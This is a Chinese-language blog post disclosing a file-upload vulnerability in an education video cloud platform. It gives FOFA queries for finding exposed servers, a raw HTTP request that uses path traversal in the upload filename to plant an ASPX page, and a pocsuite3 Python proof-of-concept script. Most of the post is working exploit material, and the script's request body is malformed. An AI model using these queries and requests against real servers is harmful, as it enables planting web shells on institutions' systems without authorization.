免责声明
文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责
漏洞描述
此教育视频云平台是一种教育技术解决方案,致力于提供高质量的在线教育视频服务。该平台为教育机构和教师提供了一个全面的视频管理和交流平台。它具有以下特点:首先,平台支持上传、存储和管理各种教育视频内容,包括课程录像、教学资源等。
fofa语句
body="Copyright © 2005-2018 广州市奥威亚电子科技有限公司"
body="/Upload/DomainInfo/MaxAVALogo.png"poc语句加检测
POST /Tools/Video/VideoCover.aspx HTTP/1.1
Host: xxxxx
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insectre-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 1015 7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/107.0.0.0 Safari 537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avifimage/webp,image/apng,*/*;q=0.8,application/signed-exchangev=b3;q=0.9
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;g=0.9
Cookie: ASP.NET_SessionId=pgfnw0patx4kh0jsnpjgzcmq; PrivateKey=f09020eaf656f9cf5d9292d39c296d1c
Connection: close
Content-Type:multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 294
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data, name= "file";filename="/../../../AVA.ResourcesPlatform.WebUI/test.aspx"
Content-Type: image/jpeg
<%@Page Language="C#"%>
<%
Response.Write("test");
%>
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
出现success说明上传成功,可到目标ip/test.aspx页面查看
poc脚本
脚本用的pocsuite框架
# _*_ coding:utf-8 _*_
# @Time : 2023/12/7
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str
class Education_cloud_platform_upload(POCBase):
pocDesc = '''教育视频云平台文件上传漏洞'''
author = '炼金术师诸葛亮'
createDate = '2023-12-07'
name = '教育视频云平台文件上传漏洞'
def _verify(self):
result = {}
url = self.url+ '/Tools/Video/VideoCover.aspx'
check_path = self.url+ "/test.aspx"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Connection': 'close',
"Cookie": "ASP.NET_SessionId=d2adfopq0zkmjygoaov13pwh; PrivateKey=f09020eaf656f9cf5d9292d39c296d1c",
"Content-Type": "image/jpeg"
}
path = "/Tools/Video/VideoCover.aspx"
try:
data = {'------WebKitFormBoundaryVBf7Cs8QWsfwC82M',
'Content-Disposition: form-data, name= "file";filename="/../../../AVA.ResourcesPlatform.WebUI/test.aspx"',
'<%@Page Language="C#"%>',
'<%Response.Write("test");%>',
'------WebKitFormBoundaryVBf7Cs8QWsfwC82M--'}
response = requests.post(url, headers=headers, data=data)
if response.status_code == 200:
check_response = requests.get(check_path, headers=headers, verify=False)
if check_response.status_code == 200 and 'test' in check_response.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['path'] = path
return self.parse_output(result)
except Exception as e:
pass
register_poc(Education_cloud_platform_upload)脚本使用
![[node] Node.js的Web 模块](https://img-blog.csdnimg.cn/999f27a1616742569128568e8d1f3b4a.png)
